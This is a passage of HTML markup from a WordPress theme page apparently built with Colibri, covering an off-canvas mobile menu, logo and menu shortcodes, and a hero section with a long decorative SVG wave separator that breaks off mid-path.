data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path 